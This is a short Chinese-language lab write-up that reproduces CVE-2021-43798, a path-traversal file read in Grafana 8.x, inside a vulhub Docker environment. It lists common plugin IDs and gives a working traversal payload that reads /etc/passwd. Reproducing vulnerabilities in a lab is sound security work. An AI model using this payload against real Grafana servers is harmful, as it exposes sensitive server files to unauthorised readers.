1 漏洞信息
漏洞名称 | Grafana 8.x 任意文件读取漏洞 |
---|---|
漏洞编号 | CVE-2021-43798 |
危害等级 | 中危 |
CVSS评分 | 5.0 |
漏洞类型 | 中间件漏洞 |
漏洞厂商 | Grafana |
漏洞组件 | Grafana |
受影响版本 | Grafana 8.0.0 - 8.3.0 |
漏洞概述 | 未授权的攻击者利用该漏洞,能够获取服务器敏感文件。 |
2 环境搭建
2.1 环境概述
- Linux操作系统(vulhub)
2.2 搭建过程
进入到目标路径,拉取镜像
cd vulhub/grafana/CVE-2021-43798
docker-compose up -d
{width=“5.759722222222222in”
height=“0.5472222222222223in”}
查看容器信息,发现是3000端口
docker ps
{width=“5.759027777777778in”
height=“0.21805555555555556in”}
打开网页,搭建成功
{width=“5.759722222222222in”
height=“2.4993055555555554in”}
3 漏洞复现
在进行改漏洞的复现前我们需要先获取该网页一个已安装的插件id,比较常见的有:
alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text
我这里选用alertlist插件id来进行构造恶意的payload。
/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
{width=“5.763194444444444in”
height=“4.811111111111111in”}
4 修复建议
1.升级到最新版本